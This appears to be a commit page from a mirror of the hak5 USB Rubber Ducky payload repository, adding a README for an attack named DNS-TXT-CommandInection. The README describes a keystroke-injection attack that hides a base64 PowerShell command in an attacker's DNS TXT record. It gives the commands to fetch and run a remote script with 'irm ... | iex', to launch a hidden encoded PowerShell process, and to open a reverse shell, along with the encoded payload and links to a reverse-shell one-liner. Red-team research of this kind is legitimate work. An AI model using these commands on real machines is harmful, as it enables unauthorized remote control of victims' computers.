hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create README.md

pull/468/head
Nate 2024-08-03 23:27:09 -05:00 committed by GitHub
parent 460c95f5df
commit 784e37b063
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 43 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
payloads/library/execution/DNS-TXT-CommandInection/README.md Normal file
View File

@ -0,0 +1,43 @@
# DNS-TXT-CommandInection
Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
## Description
A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
## Requirements
A domain with the ability to manipulate the DNS TXT records.
Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
## Notes
No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)
## Windows Commands (used in payload)
### Execute DNS TXT Payload
```Powershell
powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
```
### Execute web hosted Powershell Reverseshell
```Powershell
irm http://MY_TARGET_URL/T1.txt | iex
```
### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
```Powershell
.\powershellReverseShellOne-liner.ps1
```
### Convert payload to base64
```Powershell
.\convertBase64.ps1
```
### Alternative to executing Powershell Script
```Powershell
gc -raw .\convertBase64.ps1 | iex
```
### Links
[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
[Convert to base64](https://pypi.org/project/uploadserver/)
[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)